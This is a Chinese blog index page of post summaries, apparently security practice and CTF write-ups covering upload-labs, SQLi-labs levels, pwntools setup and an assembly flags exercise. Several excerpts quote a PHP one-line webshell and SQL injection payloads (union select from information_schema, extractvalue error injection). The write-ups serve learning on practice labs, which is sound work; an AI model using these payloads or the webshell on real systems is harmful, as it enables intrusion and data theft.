摘要: Pass-01:前端过滤 提示 需要上传一个webshell我选择的是一句话,根据提示可采用两种方法进行绕过 <?php eval(@$_POST['a']); ?> 绕过方法 1.查看源码,发现允许上传的是".jpg|.png|.gif"这三种类型,所以就考虑到是不是可以先把后缀改成png,然后抓 阅读全文
posted @ 2019-10-12 21:52 东坡肉肉君 阅读(691) 评论(0) 推荐(0) 编辑
摘要: 在响应包里面发现tips,base64解码后看到提示信息: $sql="SELECT username,password FROM admin WHERE username='".$username."'" if (!empty($row) && $row['password'] md5($pass 阅读全文
posted @ 2019-10-12 01:04 东坡肉肉君 阅读(632) 评论(0) 推荐(0) 编辑
摘要: http://123.206.87.240:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% uname=admin&passwd=1' and '1 : 一个一个式,但是要用url编码绕过滤[其实是猜他会去解析,这里我是猜出来的] 重定向以后,根据提示输入ls: 阅读全文
posted @ 2019-10-12 00:47 东坡肉肉君 阅读(245) 评论(0) 推荐(0) 编辑
摘要: 1' and '0,1' and '1 : 单引号闭合 1' order by 3--+ : 猜字段 1' union select 1,database()# :开始注入,发现正则过滤 1' and extractvalue(0x0a,concat(0x0a,(database())))# :数据 阅读全文
posted @ 2019-10-11 21:24 东坡肉肉君 阅读(5521) 评论(1) 推荐(2) 编辑
摘要: 安装pwntool: 命令行运行: 1 pip install pwntools 1 python 2 import pwn 3 pwn.asm("xor eax,eax") 出现'1\xc0' 说明安装成功 在pycharm中运行出错:_curses.error: must call (at le 阅读全文
posted @ 2019-10-10 22:06 东坡肉肉君 阅读(5178) 评论(1) 推荐(1) 编辑
摘要: 阅读全文
posted @ 2019-10-10 00:59 东坡肉肉君 阅读(245) 评论(0) 推荐(0) 编辑
摘要: Less-54: ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ Your Password:CL0FY8NWDK ?i 阅读全文
posted @ 2019-10-09 23:52 东坡肉肉君 阅读(295) 评论(0) 推荐(0) 编辑
摘要: 检测点11.2 CF(判断溢出) OF(判断溢出) SF(结果是否为0找到的规律是只要第八位为1就填1) ZF (结果是否为0) PF(1的个数是否为偶数) 分析 sub al,al 0 0 0 1 1 减法,结果为0,zf=1 mov al,10H 0 0 0 1 1 mov指令不改变标志位 ad 阅读全文
posted @ 2019-10-08 20:03 东坡肉肉君 阅读(310) 评论(0) 推荐(0) 编辑
摘要: Less-39: ?id=1 and 1 ,?id=1 and 1 : 回显不同,数字型 ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=databas 阅读全文
posted @ 2019-10-08 00:28 东坡肉肉君 阅读(407) 评论(0) 推荐(0) 编辑
摘要: Less-21:括号+单引号绕过+base64cookie编码 总感觉我已经把sql注入做成代码审计了:P 1 <?php 2 //including the Mysql connect parameters. 3 include("../sql-connections/sql-connect.ph 阅读全文
posted @ 2019-10-06 11:51 东坡肉肉君 阅读(527) 评论(0) 推荐(0) 编辑